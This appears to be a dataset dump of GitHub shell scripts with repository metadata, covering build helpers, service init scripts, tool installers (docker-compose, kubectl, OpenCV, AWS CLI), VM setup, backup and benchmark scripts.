blob_id stringlengths 40 40 | language stringclasses 1
value | repo_name stringlengths 4 115 | path stringlengths 2 970 | src_encoding stringclasses 28
values | length_bytes int64 31 5.38M | score float64 2.52 5.28 | int_score int64 3 5 | detected_licenses listlengths 0 161 | license_type stringclasses 2
values | text stringlengths 31 5.39M | download_success bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
50a16a1edc39ce2ac251a458e07decc994cfb402 | Shell | ephemerallabs/heroku-buildpack-python | /bin/steps/geodjango_wkhtmltopdf | UTF-8 | 1,398 | 3.59375 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# This script serves as the wkhtmltopdf install step
# based on geodjango buildpack
# [**GeoDjango Buildpack**](https://github.com/dulaccc/heroku-buildpack-geodjango)
# compiler.
#
# A [buildpack](http://devcenter.heroku.com/articles/buildpacks) is an
# adapter between a Python application and Hero... | true |
9c194fe712f29e1192ad8e1f753d30d274533e71 | Shell | bwgartner/suse-doc | /bin/xml2daps-pdf.sh | UTF-8 | 140 | 2.75 | 3 | [] | no_license | #! /bin/sh
type daps || {
echo "missing 'daps' binary, please install it"
exit 1
}
MyDC=DC-${1%.adoc}
daps --verbosity=3 -d ${MyDC} pdf
| true |
512a032065b2748d02920c32b641e8678fbf359f | Shell | vbajaria/config-1 | /kafka/init.d | UTF-8 | 336 | 3.515625 | 4 | [] | no_license | #!/bin/bash
USAGE ()
{
echo "Usage: $NAME {start|stop} " >&2
}
case "$1" in
start)
/usr/lib/kafka/bin/kafka-server-start.sh /usr/lib/kafka/config/server.properties > /var/log/kafka/access_log 2> /var/log/kafka/error_log
;;
stop)
/usr/lib/kafka/bin/kafka-server-stop.sh
;;
*)
USAGE
exit 1
... | true |
156c44629647e9630f4ebe207cd45c3945d72ae3 | Shell | ajchilts/trusts-frontend | /migrations/applied_migrations/CountryGoverningTrust.sh | UTF-8 | 3,312 | 2.625 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
echo ""
echo "Applying migration CountryGoverningTrust"
echo "Adding routes to conf/app.routes"
echo "" >> ../conf/app.routes
echo "GET /countryGoverningTrust controllers.register.trust_details.CountryGoverningTrustController.onPageLoad(mode: Mode = NormalMode)" >> ../conf/a... | true |
7bfd415f637ade23406c381c597750a433310a99 | Shell | danielgpalmer/obscuremicros | /arm-softfloat-eabi/lpc2294/mkproject.sh | UTF-8 | 762 | 3.234375 | 3 | [] | no_license | #!/bin/bash
set -e
if [ $# -ne 1 ]; then
echo "usage; $0 <new project name>";
exit 0;
fi;
if [ -e $1 ]; then
echo "directory already exists";
exit 1;
fi;
mkdir $1;
LINKEDSOURCES="crt-ram.s crt.s \
syscalls.c syscalls.h \
lpc21xx.h lpc22xx.h olimexh2294.h \
core.h core.c config.h .gdbinit \
interrupts.c interr... | true |
844d7d1636ba49faecb84f18b7175fae4c845cc3 | Shell | dynight/bokeh | /scripts/ci/test.examples | UTF-8 | 410 | 2.84375 | 3 | [
"BSD-3-Clause"
] | permissive | #!/bin/bash
set -e # exit on error
set -x # echo commands
if [[ $TRAVIS_COMMIT_MSG == *"[ci disable examples]"* ]]; then
echo
echo " SKIPPING EXAMPLES TESTS --- disabled by commit message"
echo
exit 0
fi
py.test -s -v -m examples \
--tb line \
--diff-ref FETCH_HEAD ... | true |
9fbcbab1c74536acd9fd6b650a124d003507f315 | Shell | rafaelsoaresbr/docker-utils | /docker-utils.sh | UTF-8 | 1,754 | 3.40625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
COMPOSE_VER="1.21.0"
MACHINE_VER="v0.14.0"
KUBECTL_VER="v1.10.2"
MINIKUBE_VER="v0.26.1"
MINISHIFT_VER="1.16.1"
mkdir -p "$HOME"/bin/bash_completion.d
# docker-compose
curl -L https://github.com/docker/compose/releases/download/$COMPOSE_VER/docker-compose-"$(uname -s)"-"$(uname -m)" -o "$HOME"/bin/docker-... | true |
81c5f3ead8e5862f57e33eb6e801ee1a9fd59791 | Shell | SrinivasaBharath/ceph-1 | /qa/workunits/rbd/huge-tickets.sh | UTF-8 | 1,367 | 3.46875 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# This is a test for http://tracker.ceph.com/issues/8979 and the fallout
# from triaging it. #8979 itself was random crashes on corrupted memory
# due to a buffer overflow (for tickets larger than 256 bytes), further
# inspection showed that vmalloced tickets weren't handled correctly as
# well.
#... | true |
2b58fe33ee7f22745d273997da6cadfed4458f51 | Shell | nchovan/linux | /scripts/bills_edit.sh | UTF-8 | 312 | 2.703125 | 3 | [] | no_license | #echo bills log with edit info
echo "Bills file was edited on $(date) by $USER $(uname -ns) " >> /var/log/bills.log
#changes the last update: string in file
sed -i "s/lastupdate:.*/lastupdate:$(date)/" ~/Documents/bills.txt
#saves a backup of file
cp ~/Documents/bills.txt ~/Documents/backups/bills_backup.txt
| true |
dab2f8d3c330fa7fc00b77816b321e4b69538069 | Shell | david-cako/switchaudio-osx-hotkeys | /audio_switch.sh | UTF-8 | 549 | 2.78125 | 3 | [] | no_license | #!/bin/bash
case `/usr/local/bin/SwitchAudioSource -c` in
# switchaudio-osx lacks enumeration in case of duplicate source names; suppress output of
# first two source changes so that notification shows correctly
'Line-out (Green Rear)')
/usr/local/bin/SwitchAudioSource -s "Digital-out (HDMI)" > /de... | true |
81ba608688c12ed57bed06825dc90eaf3fd78427 | Shell | hw233/KFrame | /1.Server/3.Games/1.Lori/Resource/protocol/linux.sh | UTF-8 | 927 | 3.09375 | 3 | [
"Apache-2.0"
] | permissive | #! /bin/sh
cd proto
sh __cpp_class.sh
cd ../
\cp *.pb.* ../../Server/KFContrib/KFProtocol/
rm -f *.pb.*
# make proto version
function makeversion()
{
oldmd5client=`cat .md5list | grep "$1" | cut -d ":" -f 2`
newmd5client=`md5sum ./proto/$1 | awk '{print $1}'`
declare -i version=`cat .md5list | grep "$1" | cut ... | true |
e08506f827f66002a4b9f4bceab8d3bab9358cfe | Shell | ricardoc2016/iw-status-api | /docker/custom/start.sh | UTF-8 | 541 | 2.921875 | 3 | [] | no_license | #!/usr/bin/env bash
echo "Starting IW Status API Environment...";
echo "Executing install.sh";
/development/install.sh;
echo "Adding php.ini...";
cp -f /development/docker/custom/php.ini /usr/local/etc/php/conf.d/php.ini;
touch /tmp/php_errors.log
chmod -R 777 /tmp/php_errors.log;
echo "Installing and enabling ... | true |
ae552744e05ed5072dd0e23ef27825cc5e014dd5 | Shell | dpordomingo/pga-performance | /1st-analysis/analyze.sh | UTF-8 | 1,214 | 4 | 4 | [
"MIT"
] | permissive | #!/bin/bash
WHERE=$1
SLEEP_FIRST=$2
SLEEP_SECOND=$3
INPUT=INPUT.log
SUCCESS_LOG=success.log
ERROR_LOG=error.log
ERROR_LOG_VERBOSE=error_verbose.log
rm -f ${INPUT}
rm -f ${SUCCESS_LOG}
rm -f ${ERROR_LOG}
rm -f ${ERROR_LOG_VERBOSE}
function analyze {
LOG=gitbase.log
READY="server started and listening on loca... | true |
a563454f70c044a0d7683a93f1c49b528c901f03 | Shell | JakeAdler/shsg | /examples/blog/src/blog/index.sh | UTF-8 | 598 | 3.078125 | 3 | [] | no_license | HEAD="<link rel='stylesheet' href='__index.css'/>"
BLOG_FILES=$(find "$SRC_DIR/blog" -type f -name "*.md")
BLOG_LINKS=""
for FILE in $BLOG_FILES; do
RELATIVE_PATH=$(basename $(infer_out_path "$FILE"))
__FM=$(parse_frontmatter "$FILE")
eval "$__FM"
export BLOG_LINKS=$(cat <<EOF
${BLOG_LINKS}
... | true |
05d7de771a10340b0ff306468a114a798f78f2da | Shell | march-linux/march-overlay | /march-reset-package | UTF-8 | 504 | 3.046875 | 3 | [] | no_license | #!/bin/bash
sort -u <(expac '%n') <(expac '%E' -l '\n') > /tmp/march-old
grep -v -h ^# /usr/share/march/packages.list | sort -u > /tmp/march-new
while true; do
sort -u /tmp/march-new <(expac '%E' -l '\n' $(</tmp/march-new)) > /tmp/march-new2
if cmp -s /tmp/march-new /tmp/march-new2; then
rm /tmp/march-new2
break
... | true |
57fb08b6b182d607d410ea9061f62bb2f936045d | Shell | justrohan/AppD-Cloud-Kickstart | /provisioners/scripts/common/install_aws_cli.sh | UTF-8 | 5,455 | 4.125 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/sh -eux
#---------------------------------------------------------------------------------------------------
# Install AWS Command Line Interface (CLI) by Amazon.
#
# The AWS Command Line Interface (CLI) is a unified tool to manage your AWS services. With
# just one tool to download and configure, you can contro... | true |
b7285912ea6b558350d24537725a89e6ca533978 | Shell | khorton/scripts | /FreeNAS/backup_freenas_rsync.sh | UTF-8 | 348 | 2.65625 | 3 | [] | no_license | #!/bin/bash
# Backup FreeNAS BigBertha server
export MY_LOGDIR=/root
MY_SCRIPT=`basename ${0}`
MY_SYSTEM=`uname -n | cut -f1 -d'.'`
CUR_DATE=`date +%Y\%m\%d`
export MY_SCRIPT MY_SYSTEM CUR_DATE
zpool scrub bu01
rsync -aHSX --delete --progress --stats --exclude-from '/root/rsync_exclude-list.txt' /mnt/main/ /mnt/bu... | true |
cc0abe65cbb9ecf38805576df51d7960d4ae45bf | Shell | raja448/example-voting-app | /wxs_con/startContainer.sh | UTF-8 | 1,347 | 3.40625 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
#####################################################################################
# #
# Script to start the Container.sh #
# ... | true |
be92663cf960b848651d5c65f07c475fe33bca86 | Shell | imclab/firefoxos-tools | /bin/make-app.sh | UTF-8 | 357 | 3.15625 | 3 | [] | no_license | #!/bin/sh
PYTHON=`which python`
WHOAMI=`$PYTHON -c 'import os, sys; print os.path.realpath(sys.argv[1])' $0`
BIN=`dirname $WHOAMI`
ROOT=`dirname $BIN`
APPS=${ROOT}/apps
BOILERPLATE=${APPS}/boilerplate
APP_PATH=`$PYTHON -c 'import os, sys; print os.path.realpath(sys.argv[1])' $1`
APP_NAME=`basename $APP_PATH`
echo ... | true |
7675390ba2103919305fe6f9c1c91c6ca1bb9018 | Shell | oozkaya/42_boot2root | /scripts/vm/createVM.sh | UTF-8 | 3,180 | 4.1875 | 4 | [] | no_license | #! /bin/bash
CURDIR=`dirname $0`
MACHINENAME="Boot2Root"
ISOPATH="$CURDIR/Boot2Root.iso"
ISO_INTRA_LOCATION="https://projects.intra.42.fr/uploads/document/document/2527/BornToSecHackMe-v1.1.iso"
START_VM_SCRIPT="$CURDIR/startVM.sh"
function checkVM {
IS_VM_EXIST=`VBoxManage list vms | grep -i $MACHINENAME | wc -... | true |
b26ec3fbc62403f7144b30132f95713fce06fbd3 | Shell | tpm2-software/tpm2-pkcs11 | /.ci/download-deps.sh | UTF-8 | 1,778 | 3.671875 | 4 | [
"Apache-2.0",
"BSD-2-Clause"
] | permissive | #!/usr/bin/env bash
# SPDX-License-Identifier: BSD-2-Clause
function get_deps() {
source "${DOCKER_BUILD_DIR}/test/integration/scripts/helpers.sh"
check_openssl_version
if [ "$OSSL3_DETECTED" -eq "1" ]; then
engine_pkg="tpm2-openssl"
engine_flags=""
engine_version="master"
tpm2_tss_version="3.2.0"
else
... | true |
e2ce9d492fb38c9fb681c6ac466d462535ef85c8 | Shell | Jun-Lizst/Aydin_2019_iAscl1-vs-iNeurog2 | /utils/bulk_download_from_sra.sh | UTF-8 | 267 | 2.546875 | 3 | [] | no_license | while getopts "i:" OPTION
do
case "$OPTION" in
i)
FILE=$OPTARG
;;
esac
done
while read line
do
~/group/software/sratoolkit.2.3.5-2-ubuntu64/bin/fastq-dump --split-3 $line
done < $FILE
| true |
04e220d72d4b43518a0ce5866d7f12929564ebbe | Shell | pjd/pjdfstest | /tests/link/14.t | UTF-8 | 775 | 3.203125 | 3 | [
"BSD-2-Clause"
] | permissive | #!/bin/sh
# vim: filetype=sh noexpandtab ts=8 sw=8
# $FreeBSD: head/tools/regression/pjdfstest/tests/link/14.t 211352 2010-08-15 21:24:17Z pjd $
desc="link returns EXDEV if the source and the destination files are on different file systems"
dir=`dirname $0`
. ${dir}/../misc.sh
[ "${os}" = "FreeBSD" ] || quick_exit
... | true |
749b9fa15ff37ad34098248bce6cce409ab005f6 | Shell | twiiks/fontto-training | /train_debugging.sh | UTF-8 | 1,346 | 3.09375 | 3 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | #!/usr/bin/env bash
echo `date`
# make dataset
JPG_DIR=fonts_256
DATASET_DIR=datasets
CHECK_DIR=checkpoints
DEBUGGING_DATA=B9DD_D569_debugging
# these values should be changed accordingly
NUM_THREADS=6
GPU_IDS=0,1,2,3
SLACK_FREQ=10000
BATCH_SIZE=60
EPOCH=10
printf "_____________start debugging [%s]_____________\... | true |
4f45aae9bca4d06de1685456f8108522329446bb | Shell | ajhammond12345/fbla | /stop.sh | UTF-8 | 248 | 3.125 | 3 | [] | no_license | #!/bin/sh
# Copyright (C) 2017 Alexander Hammond
SERVER_FILE="tmp/pids/server.pid"
if [ -f $SERVER_FILE ]; then
SERVER_PID=`cat tmp/pids/server.pid`
kill $SERVER_PID &
fi
# Make sure is killed
if [ -f $SERVER_FILE ]; then
sleep 2
kill -4 $SERVER_PID
fi
| true |
1293e61c1a5533c7ef58a727f90ee75b07bb439f | Shell | karelia/CurlHandle | /Scripts/c-ares-combine.sh | UTF-8 | 874 | 3.203125 | 3 | [] | no_license | # glibtoolize (and maybe other tools) are not supplied with OS X.
# Add default macports & homebrew paths in attempt to find them.
export PATH=${PATH}:/opt/local/bin:/usr/local/bin
# Create final dylibs.
cd "${OBJROOT}"
lipo -create -arch i386 cares-i386/.libs/libcares-i386.dylib -arch x86_64 cares-x86_64/.libs/libca... | true |
1c7c1b1a49b4b0b04bfd46fa812090aa8935c22d | Shell | spog/meta-u2up-pc-installer | /scripts/build_u2up-homegw-pc-installer_wic.sh | UTF-8 | 3,759 | 4 | 4 | [
"BSD-3-Clause"
] | permissive | #!/bin/bash
#
# The "u2up-homegw-pc-installer" Wic image build script
#
# Copyright (C) 2019 Samo Pogacnik <samo_pogacnik@t-2.net>
# All rights reserved.
#
# This file is provided under the terms of the BSD 3-Clause license,
# available in the LICENSE file of the "meta-u2up-pc-installer" software project.
#
#set -x
#se... | true |
0bb860b9b2ff47144c6beb577d045054969864f8 | Shell | IanDarwin/scripts | /mvnup | UTF-8 | 229 | 2.59375 | 3 | [
"MIT"
] | permissive | #!/bin/sh
# Update a project's deps, whether given in properties or inline, and show plugin updates
set -x
mvn versions:use-latest-releases versions:update-properties
mvn versions:display-plugin-updates | grep -- '->' | sort
| true |
35bbf0429f5f05f4d47d3c486d48a2e158425332 | Shell | hightoxicity/kubespray | /contrib/offline/generate_list.sh | UTF-8 | 2,869 | 3.4375 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
set -eo pipefail
CURRENT_DIR=$(cd $(dirname $0); pwd)
TEMP_DIR="${CURRENT_DIR}/temp"
REPO_ROOT_DIR="${CURRENT_DIR%/contrib/offline}"
: ${IMAGE_ARCH:="amd64"}
: ${ANSIBLE_SYSTEM:="linux"}
: ${ANSIBLE_ARCHITECTURE:="x86_64"}
: ${DOWNLOAD_YML:="roles/download/defaults/main.yml"}
: ${KUBE_VERSION_YAML:="roles... | true |
8a0d0de2b631f023ba4a99898099af1e75f321b4 | Shell | cry/dotfiles | /init.sh | UTF-8 | 403 | 3.40625 | 3 | [] | no_license | #!/usr/bin/env bash
GLOBIGNORE=.
if [[ ! -d ~/.local/dotfiles ]]; then
mkdir -p ~/.local/dotfiles
fi
for d in */; do
[[ $d =~ '.' ]] && continue
echo "[+] Entering $d"
pushd $d > /dev/null 2>&1
if [[ -f "init.sh" ]]; then
./init.sh
fi
for f in .*; do
[[ "$f" == '.*' ]] && co... | true |
22668435d189bce20869f01b16142c7e27b4c334 | Shell | peedy2495/reflector | /reflector.sh | UTF-8 | 5,736 | 3.890625 | 4 | [
"MIT"
] | permissive | #!/bin/bash
#Get all repositories from online sources
# estimated total Size ~650GB
main() {
rdir="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )"
cd ${rdir}
get_required config/reflector.conf
do_yum
do_apt
do_misc
exit 0
}
do_yum() {
###############################
### Repositories ... | true |
49a2560ddd1301c74974436ff87de70b7e970221 | Shell | halfmanhalftaco/tgcware-for-irix | /binutils/build.sh | UTF-8 | 1,896 | 2.984375 | 3 | [] | no_license | #!/usr/tgcware/bin/bash
# This is a buildpkg build.sh script
# build.sh helper functions
. ${BUILDPKG_SCRIPTS}/build.sh.functions
#
###########################################################
# Check the following 4 variables before running the script
topdir=binutils
version=2.22
pkgver=1
source[0]=ftp://ftp.sunet.se/p... | true |
981623b0e829ee244e90f520a242452e7e2b6433 | Shell | Azariagmt/shell-practice-files | /date.sh | UTF-8 | 119 | 2.75 | 3 | [] | no_license | #!/bin/sh
directory=`pwd`
echo "Hello World!"
echo The date today is `date`
echo "The working directory is $directory"
| true |
9abf0b0019c45020c6aab61c892f12b6c67b87ab | Shell | mmatschiner/anguilla | /wgs_mapped/src/make_blast_dbs.sh | UTF-8 | 261 | 2.609375 | 3 | [] | no_license | # m_matschiner Wed Dec 25 14:27:00 CET 2019
# Load the blast module.
module load blast+/2.2.29
# Make a blast database for each fasta subject.
for i in ../res/mitobim/*.fasta
do
if [ ! -f ${i}*.nhr ]
then
makeblastdb -in ${i} -dbtype nucl
fi
done | true |
506db0eaf8468f9bcb03f4606b5e9054cf5c65b7 | Shell | trilitheus/esxi_bash | /vm_command | UTF-8 | 5,072 | 4.03125 | 4 | [] | no_license | #!/bin/bash
set -e
show_usage() {
cat << EOF
Usage: ${0##*/} [-u esxi_username] [-h esxi_hostname] [-i ssh_key_file] [-a action] [-s size] [-d datastore] [-b build] [-o clone_dir ] [-v]
-u esxi_username : specify the username to connect to esxi with
-h esxi_hostname : specify the esxi host
-i ssh_key_file :... | true |
2bd32560f02df6a14f324dfb4d657b874cd3a06a | Shell | pdorobisz/data-processing-example | /bin/kafka-consumer.sh | UTF-8 | 391 | 3.25 | 3 | [] | no_license | #!/bin/sh
if [ $# -ne 1 ]; then
echo "Usage: $0 TOPIC"
exit 1
fi
KAFKA_CONTAINER_NAME=dataprocessingexample_kafka_1
KAFKA_CONTAINER_ID=`docker ps -f "name=$KAFKA_CONTAINER_NAME" -q`
echo connecting to $KAFKA_CONTAINER_ID container...
docker exec $KAFKA_CONTAINER_ID /bin/sh -c "\$KAFKA_HOME/bin/kafka-console-consu... | true |
7d18497e2428fea5e700eae5a69cf9589b6cc68e | Shell | duncanje/dissertation | /iperf/iperf-test | UTF-8 | 895 | 4.15625 | 4 | [
"MIT"
] | permissive | #!/bin/sh
TEST_NUM=3
TEST_MIN_INTERVAL=5
REPORT_INTERVAL=1
TEST_LENGTH=60
UDP_TARGET="54M"
if [ -z "$1" -o -z "$2" ]; then
echo "Arguments: <iperf_server> <out_dir>"
exit 1
fi
IPERF_SERVER=$1
OUT=$2
mkdir -p "$OUT"
runTest() {
FLAGS="-i $REPORT_INTERVAL -t $TEST_LENGTH"
proto=$1
if [ "$proto" == "UDP" ]; then... | true |
61169570007c7a3aaf27581eaf0c1fd8a22dc858 | Shell | shouc/corbfuzz | /php/buildconf | UTF-8 | 4,012 | 4.125 | 4 | [
"MIT",
"GD",
"BSD-3-Clause",
"BSD-4-Clause-UC",
"ISC",
"IJG",
"Zlib",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-other-permissive",
"TCL",
"BSD-2-Clause",
"OLDAP-2.8",
"PHP-3.01"
] | permissive | #!/bin/sh
#
# A wrapper around Autoconf that generates files to build PHP on *nix systems.
PHP_AUTOCONF=${PHP_AUTOCONF:-autoconf}
PHP_AUTOHEADER=${PHP_AUTOHEADER:-autoheader}
force=0
debug=0
# Go to project root.
cd $(CDPATH= cd -- "$(dirname -- "$0")" && pwd -P)
php_extra_version=$(grep '^AC_INIT(' configure.ac)
ca... | true |
0ea0cdd5895bd27c6938ec540537156896d60663 | Shell | TomMicha/azuredeploy-templates | /dbz-extension/extDbzscript.sh | UTF-8 | 1,294 | 3.046875 | 3 | [] | no_license | # script shell for databricks external space - redefine subnets add bastion
echo Starting databricks extension script with networking configurations
case $1 in
'dev')
echo Provided input, $1 is running
templateParams="https://raw.githubusercontent.com/TomMicha/azuredeploy-templates/master/dbz-exte... | true |
ae96a6b805e0ee3bff460d74ae592f3d02bb939b | Shell | pps83/lightpng | /build.sh | UTF-8 | 1,156 | 2.9375 | 3 | [
"MIT",
"CC-BY-3.0"
] | permissive | #! /bin/sh
scons -c --no-opensource
scons -c
if [ -d build ] ; then
rm -rf build
fi
mkdir build
mkdir build/lightpng_mac_opensource
mkdir build/lightpng_mac_noopensource
mkdir build/lightpng_win_opensource
scons
mv lightpng build/lightpng_mac_opensource/
cp LICENSE.rst build/lightpng_mac_opensource/
cp README.rs... | true |
7eba80d5f7e2974e5cd921206b949459ac13a632 | Shell | godane/abs | /extra/imagemagick-doc/PKGBUILD | UTF-8 | 948 | 2.515625 | 3 | [] | no_license | # $Id: PKGBUILD 81430 2010-05-30 07:52:34Z dgriffiths $
# Contributor: Eric Belanger <eric@archlinux.org>
# Maintainer: Daniel J Griffiths <ghost1227@archlinux.us>
pkgname=imagemagick-doc
pkgver=6.6.2.0
pkgrel=1
pkgdesc="The ImageMagick documentation (utilities manuals and libraries API)"
arch=('any')
url="http://www.... | true |
0e9c241dc018910a2ff8799c8f03c6b0e90574a5 | Shell | dhardiman/dotfiles | /.zshrc | UTF-8 | 3,304 | 2.96875 | 3 | [] | no_license | # Path to your oh-my-zsh configuration.
ZSH=$HOME/.oh-my-zsh
# Set name of the theme to load.
# Look in ~/.oh-my-zsh/themes/
# Optionally, if you set this to "random", it'll load a random theme each
# time that oh-my-zsh is loaded.
ZSH_THEME="dave"
# Example aliases
# alias zshconfig="mate ~/.zshrc"
# alias ohmyzsh="... | true |
ab6c7c26a5aae2124b93c9cef12988c702939573 | Shell | mirloupa/GenScripts | /SH/fasta_subdir.sh | UTF-8 | 438 | 3.28125 | 3 | [] | no_license | # Create a subdirectory for each FASTA file and move FASTA file to said directory.
for file in /data2/scratch2/mirabl/Xf_proj/Sequences/WGS/DNA_fasta/*.fasta; do
file_short=$(basename $file | sed s/".fasta"//g)
echo $file_short
cp /data2/scratch2/mirabl/Xf_proj/NCBI_Xf55/Analysis_w_outgr/Annotation/"$file_s... | true |
58398800fbaa55f542e5b6d8a7c4d54ded311c39 | Shell | UCL-RITS/rcps-buildscripts | /pstreams-1.0.1_install | UTF-8 | 1,477 | 3.484375 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
set -e
package_name="pstreams"
package_version="1.0.1"
package_description="PStreams is a C++ wrapper for process control and streaming using popen and pclose."
source includes/source_includes.sh
_env_setup() {
module purge
require gcc-libs
require compilers/gnu/4.9.2
make_build... | true |
171ca7f4e277822b5d4fc8e3b729e21ad7119523 | Shell | Ikaguia/visComp | /install-opencv.sh | UTF-8 | 3,985 | 2.890625 | 3 | [] | no_license | #############################################################
# https://www.learnopencv.com/install-opencv3-on-ubuntu/ #
#############################################################
echo "#########################"
echo "# 1 #"
echo "#########################"
sudo apt-get update
sudo apt-get upgrade
echo "######... | true |
0cb4f020ffb248dc5b81d1da0e919669074e05b8 | Shell | gutsche/old-scripts | /Ntuples/copyMergedRootFilesFromdCache.sh | UTF-8 | 489 | 2.875 | 3 | [] | no_license | #!/bin/bash
# execute from /store/local/data2/cms1/cms2
dirs=`find /pnfs/cms/WAX/resilient/gutsche/ -name "*.root" | sed -e 's/\/pnfs\/cms\/WAX\/resilient\/gutsche\///g' | sed -e 's/[^/]*$//' | sort | uniq`
for dir in $dirs
do
echo "mkdir -p $dir"
mkdir -p $dir
done
files=`find /pnfs/cms/WAX/resilient/gutsche/ -name "*... | true |
4871b171654a7c006b4828a73dad163caf1e62f4 | Shell | diamondbigdata/Docker14.04 | /ubunt-vnc-desktop/start.sh | UTF-8 | 2,572 | 3.84375 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
#start ssh first
if [[ ! -a /var/run/sshd ]]; then
mkdir /var/run/sshd
fi
ps -ef|grep sshd |grep -v grep
if [ $? -ne 0 ]; then
echo "sshd seems not running, start it....."
nohup /usr/sbin/sshd > /tmp/sshd.log 2>&1 &
else
echo "sshd is running....."
fi
set -e
function log {
echo `date` $ME... | true |
7188a2e1e0b25399552887f40db08d2d8d9ee37e | Shell | solomonxie/dotfiles | /gitbook/install-gitbook-ubuntu.sh | UTF-8 | 503 | 3.046875 | 3 | [
"MIT"
] | permissive | #! /usr/bin/env bash
#
# Enviroment: Ubuntu
# Notice:
do_install_gitbook_docker(){
docker pull billryan/gitbook
alias gitbook='docker run -it --rm -v "$PWD":/gitbook -p 4000:4000 --name gitbook billryan/gitbook gitbook'
}
do_install_gitbook_manually(){
npm i npm@latest -g
npm install gitbook-cli -g... | true |
326fd55444f790bc47c438535723bf443c3323ba | Shell | ElCoronel/rhel_scripts | /dd_merge.sh | UTF-8 | 411 | 3.328125 | 3 | [] | no_license | #!/bin/bash
CURDATE=`date +%y%m%d-%H%MA`
LOCKFILE=/tmp/dd_merge.lck
JOBID=
exec &> >(tee /snowball_scripts/merge_out/dd_merge_$JOBID_$CURDATE.log)
if [ ! -e $LOCKFILE ]; then
touch $LOCKFILE
echo "Begin" `date`
cat /snowball_split/$JOBID_data.img* | dd of=/dev/sdd
echo "Completed" `... | true |
e9a220c74d4f522554c89e101573a1186d5e26e0 | Shell | jorgenpt/steam-runtime-helpers | /launch_wrapper.sh | UTF-8 | 2,250 | 4.15625 | 4 | [
"Zlib"
] | permissive | #!/bin/bash
# Copyright (C) 2014 Jørgen P. Tjernø <jorgenpt@gmail.com>
# This script is licensed under the zlib license, which can be found in
# the LICENSE file.
# A wrapper script for your game that'll make sure your game is launched
# inside the steam-runtime. Name the script `$foo` or `$foo.sh`, and
# then name yo... | true |
e86e1d897ee59f9c239e66c0ab0a8f5e5a93a640 | Shell | luoweikingjj/ceshisina | /Linux/scripts/nana/nagent.sh | UTF-8 | 2,012 | 3.796875 | 4 | [] | no_license | #!/bin/sh
function printHelp()
{
echo "Usage:"
echo "-h: usage"
echo ""
}
lineCount=10
while getopts ":h" optname
do
case "$optname" in
"h")
printHelp
exit 1
;;
*)
printHelp
exit 1
;;
\?)
echo "Invalid option -$OPTARG"
... | true |
83ffd90ad72b10f5a3f3be28b2dc887ea051a5b0 | Shell | lewis-jg-lan/my_tools | /Desktop/Script/shell/For_Bundle.sh | UTF-8 | 3,982 | 3.3125 | 3 | [] | no_license | #!/bin/sh
# For bundle Create the last setup
# Created by Saseny on 2017/03/15
# The nvram setup check.
Dir=`dirname $0`
#**********************************************************
FB_driver_Setup()
{
sudo darwinup install /AppleInternal/AppleIntelFramebuffer/AppleIntelKBLGraphicsFramebufferDiags.pax
touc... | true |
ce0069395a4138d735630b597a73fd80d6b2e970 | Shell | wsnyder/conda-packages | /.travis/common.sh | UTF-8 | 2,064 | 3.3125 | 3 | [
"Apache-2.0"
] | permissive | # Some colors, use it like following;
# echo -e "Hello ${YELLOW}yellow${NC}"
GRAY=' \033[0;30m'
RED=' \033[0;31m'
GREEN=' \033[0;32m'
YELLOW=' \033[0;33m'
PURPLE=' \033[0;35m'
NC='\033[0m' # No Color
SPACER="echo -e ${GRAY} - ${NC}"
export -f travis_nanoseconds
export -f travis_fold
export -f travis_time_start
export... | true |
c9231630644f67a3ba5d91b4980b44f377766a76 | Shell | gavinhungry/bin | /vulns | UTF-8 | 575 | 3.828125 | 4 | [] | no_license | #!/bin/bash
source $(dirname "${BASH_SOURCE[0]}")/.abash/abash.sh
VULNS_DIR=/sys/devices/system/cpu/vulnerabilities
MAX_LENGTH=0
[ -d $VULNS_DIR ] || exit 1
for VULN in ${VULNS_DIR}/*; do
VULN_NAME=$(basename $VULN)
if [ ${#VULN_NAME} -gt $MAX_LENGTH ]; then
MAX_LENGTH=${#VULN_NAME}
fi
done
for VULN in... | true |
ca1ea69e2ae670319e204744e7766c50f8ed2ec3 | Shell | weilaidb/sh | /for.sh | UTF-8 | 1,354 | 3.015625 | 3 | [] | no_license | #!/bin/sh
#function:
sum=0
for ((i=1; i<=100; i++))
do
((sum += i))
done
echo "The sum is: $sum"
sum=0
i=1
for ((; i<=100; i++))
do
((sum += i))
done
echo "The sum is: $sum"
sum=0
for ((i=1; ; i++))
do
if(( i>100 )); then
break
fi
((sum += i))
done
echo "The sum is: $sum"
sum=0
fo... | true |
49b991677d66902889788a5fee626ae3b851cbd7 | Shell | vasyl-belyey/shell | /tunnelVB.bash | UTF-8 | 3,872 | 3.65625 | 4 | [] | no_license | #! /bin/bash
#
# Functions:
#
. "$(vbShellDir.bash)""/doCMD.fun"
. "$(vbShellDir.bash)""/exists.fun"
. "$(vbShellDir.bash)""/askYN.fun"
. "$(vbShellDir.bash)""/askYNsilent.fun"
. "$(vbShellDir.bash)""/askProceed.fun"
. "$(vbShellDir.bash)""/printFile.fun"
. "$(vbShellDir.bash)""/isMac.fun"
. "$(vbShellDir.bash)""/strin... | true |
1645f1bf448ded0637d42b110b5a1eac2bdba8d3 | Shell | possientis/Prog | /shell/node.sh | UTF-8 | 1,340 | 3.078125 | 3 | [] | no_license | #!/bin/bash
echo "node.sh starting"
# (e)xit on error, treat (u)nset variable as error
set -eu
TEXT_RESET='\e[0m'
TEXT_RED='\e[0;31m'
TEXT_GREEN='\e[0;32m'
TEXT_YELLOW='\e[0;33m'
TEXT_BLUE='\e[0;34m'
TEXT_MAGENTA='\e[0;35m' # between pink and purple
TEXT_CYAN='\e[0;36m' # light ugly blue
TEXT_WHITE='\e[0;37m'
TEX... | true |
f10836c36778928715fc5cde82565b092eb9d7a9 | Shell | yarikoptic/pigz-bench | /2test.sh | UTF-8 | 1,344 | 3.546875 | 4 | [] | no_license | #!/bin/bash
